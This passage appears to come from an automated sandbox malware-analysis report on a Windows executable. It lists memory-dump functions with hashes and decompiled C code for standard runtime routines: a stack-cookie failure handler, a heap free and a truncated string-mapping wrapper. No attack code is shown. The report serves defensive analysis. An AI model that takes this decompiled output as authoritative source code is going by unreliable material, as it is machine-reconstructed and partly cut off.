Instruction Fuzzy Hash: C411DAB5B002046FCB45AFA89C545BE7FE7EFC9150B108479F506D7381DE709D058792

Uniqueness

Uniqueness Score: -1.00%

Function 06B04028, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de57f16bb44255b8a0826ebe8d60d964d12018fc88aa30bff0cc961d58a2e5e3
Instruction ID: 6b4265011002596dfe31546ea36dee5aa6965283b577a6643ed59a8709bd53c5
Opcode Fuzzy Hash: de57f16bb44255b8a0826ebe8d60d964d12018fc88aa30bff0cc961d58a2e5e3
Instruction Fuzzy Hash: 8921F874B041097BDB45EBA4D450ABEBBEBEFC5204F204468E6066B350DE71BC058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 06B0DD88, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe8f9685d28e8ff7eed61e48d0eb5a33ed7f27c2aac137856e8e86405ea968f
Instruction ID: 28252cda4d395f2ab2bb9e44170c88d73c173afec35e288ad17261dc970d9b6a
Opcode Fuzzy Hash: 4fe8f9685d28e8ff7eed61e48d0eb5a33ed7f27c2aac137856e8e86405ea968f
Instruction Fuzzy Hash: C011C4B5F142041B9F918BA994945AFFFEADFC959031491AAD909CB3C5EF30D8028791

Uniqueness

Uniqueness Score: -1.00%

Function 06B04038, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448b9ba52a32e49689513abed5752561045390428e337504041e756d48157af5
Instruction ID: c00061969d926d2ee80ffac9da0d0623571d717cb563cf92581bbff1a982b185
Opcode Fuzzy Hash: 448b9ba52a32e49689513abed5752561045390428e337504041e756d48157af5
Instruction Fuzzy Hash: 5211D570B001097BCB45F7A4D5509BEB7EBEFC4204B208868E6066B350DF70AD058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 06B0D470, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3750c164ad3d65074171db2a06e46c2a721780986864282ae9c981bf1986a741
Instruction ID: 35819e28c144872597472b9c03b39b075c6d8f2d0bfea4cfcc18e7d8087917bc
Opcode Fuzzy Hash: 3750c164ad3d65074171db2a06e46c2a721780986864282ae9c981bf1986a741
Instruction Fuzzy Hash: 6711A7757002046BCF45AFA8D854ABE7BE7EFC8250B108479FA06E7341DE70DD058792

Uniqueness

Uniqueness Score: -1.00%

Function 06B0BA90, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55dd6f07179a3ccd0bce2c45dabd6d24ccbf2db35f7ca9279de21a282b71202f
Instruction ID: 9605d8a1db5890ed3f9421f73ad9440413bfa19937139ba39f9d6cc185ec036d
Opcode Fuzzy Hash: 55dd6f07179a3ccd0bce2c45dabd6d24ccbf2db35f7ca9279de21a282b71202f
Instruction Fuzzy Hash: 3311B2B4A00209AFDB51EF20D8409AEBFB6FF84350F148469E855A7790CB31ED11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06B06BBE, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c4dce0a2cd6c80b3b3b1007afad68f19b4d25fd1c1e88c2ce19a2f0fd32caee
Instruction ID: c57adfe1444aedf04559f2736f28bd3f98ddf10e4b5213e6b5400e905d5cc8aa
Opcode Fuzzy Hash: 0c4dce0a2cd6c80b3b3b1007afad68f19b4d25fd1c1e88c2ce19a2f0fd32caee
Instruction Fuzzy Hash: 3A118FB0E042588FEB14CBA5C954EEDBFF5EF49210F144498E402B7391DB759D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B0CF58, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1ddbe2997a932954ae23ad548c6ba70dc199cbd4a3d6ffbb6c3aafc991edcb
Instruction ID: 9dc9ff09bd16dabd92918ee3d8def4c041a6a8d0f851fac5b16cf5a2dcd941f2
Opcode Fuzzy Hash: 9c1ddbe2997a932954ae23ad548c6ba70dc199cbd4a3d6ffbb6c3aafc991edcb
Instruction Fuzzy Hash: 730128717042406FDB42A7689854A7F3FDADFC91A4B1484AAF509CB381CB70DC018396

Uniqueness

Uniqueness Score: -1.00%

Function 06B0CF68, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981f5bea81ad94d2d379849b163c31355d35c24164153f601d543e1322d177a4
Instruction ID: 9f4a1f3ee07c71862abe1c59b625c569b2bd16e2f8395c5b88d960418092752b
Opcode Fuzzy Hash: 981f5bea81ad94d2d379849b163c31355d35c24164153f601d543e1322d177a4
Instruction Fuzzy Hash: CDF0D6717001146B9B45A7599850E7F3BDADBC81A4B108469F509DB340DEB0EC018796

Uniqueness

Uniqueness Score: -1.00%

Function 06B0F9B9, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfdd7eaa2571556382faf92e15bace0e74007ed6ff0301128ca203dd643b865
Instruction ID: a42ec778f536e05342ceff0099d55e29e0ca8d3f63d255f81c54b0fbe5d85d6d
Opcode Fuzzy Hash: 1dfdd7eaa2571556382faf92e15bace0e74007ed6ff0301128ca203dd643b865
Instruction Fuzzy Hash: 3801D475A00605AFCF208F58D8408A6FFF6EF88310B10C129EA9953701D731F912CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 06B06140, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a87a9f723d4bb887d74dda94e0389a1e587798d1272e2ccf0a670f5896c596c
Instruction ID: 9eb60897a1ada1fceeeaa3bf235f84a8ae3713e2274a0198393d4e0a68f7aa02
Opcode Fuzzy Hash: 3a87a9f723d4bb887d74dda94e0389a1e587798d1272e2ccf0a670f5896c596c
Instruction Fuzzy Hash: 010147302083596FC712DB70FC809CE7BA9FE8621035089EED5416F167DB3064088BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B06BD0, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a81ba698c70b5929e37b8d649aa17e06c7831518b3fa64472200e6cfcf4db1
Instruction ID: 7fd0640bbe19278b974461ab5dcd2f317ad45bd3f64ce31260ff2b01a8538f12
Opcode Fuzzy Hash: d0a81ba698c70b5929e37b8d649aa17e06c7831518b3fa64472200e6cfcf4db1
Instruction Fuzzy Hash: C2012974E042188FEB14CB99C984ADEBFF5EF4C210F148499D406BB3A1DB74AD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B0D529, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca8a3f765608f0dc3f5756bda2f0711bc1cabdc82f63f26d57cdbc2d3f38825
Instruction ID: 3ae73b41fccc684606682381a5cab9e920b7c9062fc828bf0f3528fa12b4a054
Opcode Fuzzy Hash: 9ca8a3f765608f0dc3f5756bda2f0711bc1cabdc82f63f26d57cdbc2d3f38825
Instruction Fuzzy Hash: E5F0E9B5B041102F6B9596D958908BF7FDEDECA4A831440ABE508C73C1DA20CC0143A1

Uniqueness

Uniqueness Score: -1.00%

Function 06B0BCF0, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f473a166b3b3ece528ab405c6a34bcba53fa36a647f03c29da29192dc062c2fa
Instruction ID: f1b9721f4be60a18d291f6d2715d853b6f34f3f0a844967daffaec7dcf89134d
Opcode Fuzzy Hash: f473a166b3b3ece528ab405c6a34bcba53fa36a647f03c29da29192dc062c2fa
Instruction Fuzzy Hash: 3801DB306103086BD7A0DB60D580BA6BB99FF81314F455DBDC4454FA64CB32F805CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06B0ED9F, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6deec9c1b81474827735dedcb260dc498f66691764dbc40bbee459bf0d62e4d3
Instruction ID: ddbfd06cddb6f7392adca964ecf4444279ca59a70cda8732faaf60df4348068c
Opcode Fuzzy Hash: 6deec9c1b81474827735dedcb260dc498f66691764dbc40bbee459bf0d62e4d3
Instruction Fuzzy Hash: 42F0A4757043105F87549A1DD4588ABBFEAEFC92A1304807BE949C7B41DA30DC0287A1

Uniqueness

Uniqueness Score: -1.00%

Function 06B0167A, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6650d0415670f216be3a230f7a6fee63eb12033f63ed53e26c42986a4f5106f5
Instruction ID: 1f311e5411f76d03f059cdf4e4c53db44575123b5a21006da4521ed7e912847b
Opcode Fuzzy Hash: 6650d0415670f216be3a230f7a6fee63eb12033f63ed53e26c42986a4f5106f5
Instruction Fuzzy Hash: B2F024B3B0515A6FDB95AAE8AC549BFBFDAEFC8660308447EE10DC3641D7355C028750

Uniqueness

Uniqueness Score: -1.00%

Function 06B0F9C0, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae5c29b21cea5c4ca35b4f44fc0b8ff9bddc568973680fe419e9dd9f0f755a6
Instruction ID: 7ac8e6e669f290b1c0d4b20fc9a5fea1b171db7e01faf8e20b026474e4ac0ae9
Opcode Fuzzy Hash: 9ae5c29b21cea5c4ca35b4f44fc0b8ff9bddc568973680fe419e9dd9f0f755a6
Instruction Fuzzy Hash: DE01D135A00619AFCB108F58D9408A7FBF6FF88310B04C129EA9953300D731B816CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B01AA8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a092d357345c8a42d62be2b5005e52fe61972ba470ff6a3fc2387565c776e1f3
Instruction ID: 6a00531b23fe7f69c17fc44d6f3f714179881723255d90b70d7ebf78635a9e36
Opcode Fuzzy Hash: a092d357345c8a42d62be2b5005e52fe61972ba470ff6a3fc2387565c776e1f3
Instruction Fuzzy Hash: 9AF04976E0011CABCF01EB999C05AEEBBFAEBC8250F04C026E215E3240DB3456118B90

Uniqueness

Uniqueness Score: -1.00%

Function 06B0EDB0, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae49b17a06e8254a997aca6da030fb213c3929a0291eddbb5df6c04dd5177d30
Instruction ID: 58265a1ecca49e351350abc4d2478a23b70776ac00ee19945cddc1a40f831201
Opcode Fuzzy Hash: ae49b17a06e8254a997aca6da030fb213c3929a0291eddbb5df6c04dd5177d30
Instruction Fuzzy Hash: 7BF05E757042145F4B049A4DD49896EBBDEEBC82A1314806AE909C7704DB70DC0186A4

Uniqueness

Uniqueness Score: -1.00%

Function 06B0D538, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8899e2c89c9316b07772826c38574cb55b4968b37244f16d0ef6eca7e5d332c7
Instruction ID: 4a872069244cae693a8e6b5c38163e175d626eea0e61e9c27fff78240d298046
Opcode Fuzzy Hash: 8899e2c89c9316b07772826c38574cb55b4968b37244f16d0ef6eca7e5d332c7
Instruction Fuzzy Hash: ABE092B53041142B1B8496DE589096FB7CEDFC94A8314807AE40DC7744EE60DC0183A1

Uniqueness

Uniqueness Score: -1.00%

Function 06B0BD6B, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1db9416e97f74c0ca6def5055115b9dce4ae0b085141ae93409ba643a5981c3
Instruction ID: be2585c0c941d709cbbbf1964e85b26ab97c833024d897a398ecee3ef1b86f44
Opcode Fuzzy Hash: c1db9416e97f74c0ca6def5055115b9dce4ae0b085141ae93409ba643a5981c3
Instruction Fuzzy Hash: 0BE0D1357957144FD3595B75BC104E5BF98EB8316531515FBD144CB6B1D923DC01C390

Uniqueness

Uniqueness Score: -1.00%

Function 06B06C5F, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d68f74be6e34e7bcedb672caf97f2523264efa75b0148e750fe87c79e43b1e8
Instruction ID: 95996355d955ebcf073261bf572e014d620b0e9855e195eaf217544cf619ecb4
Opcode Fuzzy Hash: 4d68f74be6e34e7bcedb672caf97f2523264efa75b0148e750fe87c79e43b1e8
Instruction Fuzzy Hash: B3E02BB23002106BDF388E5698C49677F9DDFC535571454BEE509C3280DA71D832C660

Uniqueness

Uniqueness Score: -1.00%

Function 06B09F38, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab088a5e4b58efd6726fcc8fafdd04ed70d6d5f40a7c9940158c08dee629310c
Instruction ID: 0bd35333424ebb8982bb314451ab8720048feebab2874e1c60253641f9d3149c
Opcode Fuzzy Hash: ab088a5e4b58efd6726fcc8fafdd04ed70d6d5f40a7c9940158c08dee629310c
Instruction Fuzzy Hash: 2AF0C976B00214AF8754DF6ED844D8ABBFDEF8962071580AAF119D7321DA71ED018B50

Uniqueness

Uniqueness Score: -1.00%

Function 06B0F899, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c6525c7bf563a3ef999f34d27180e0261330e1828ea53af8c4eaa687e1200b3
Instruction ID: e9ec2557c7d0a47f5b8802cc12dc2d0f50c82eb80cce5db58d1d15bc9c7ebd26
Opcode Fuzzy Hash: 1c6525c7bf563a3ef999f34d27180e0261330e1828ea53af8c4eaa687e1200b3
Instruction Fuzzy Hash: 99F0E220B042845FCF15E7B984614AEBFFAEFC1150750C8BEC806D7B46DB748C088751

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A6B5, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd87777e094d192acb78b6994bb425a5e72d8ba6371d9b3981f5fec0706ef645
Instruction ID: b9b6394b55c6838d16f549bdf88269fc7a3cb9163c36d26f67eee15344495b45
Opcode Fuzzy Hash: cd87777e094d192acb78b6994bb425a5e72d8ba6371d9b3981f5fec0706ef645
Instruction Fuzzy Hash: 0CF0F43AB01008DFCB42CF94E644DCCBBB2FB88214B20C691E508AB235C332EE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B06625, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271b4e839c4dbc4708bf14fac5d63f821fb67b4b61eb9274bde602c0da2df594
Instruction ID: e12fe9acd81889fbed5faed7103d684f2234ccd7b8b5e6a3f44487642ea97652
Opcode Fuzzy Hash: 271b4e839c4dbc4708bf14fac5d63f821fb67b4b61eb9274bde602c0da2df594
Instruction Fuzzy Hash: 15C0123EB00219CFCB008BA4E494898B330FB8422A71080BAD51A83221C732A86ACB10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0xf443c6c0
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0xf443c6c0
				_v812 = _t12;
				_t13 =  *0x422238; // 0xbbc393f
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0, Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0xf443c6c0
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
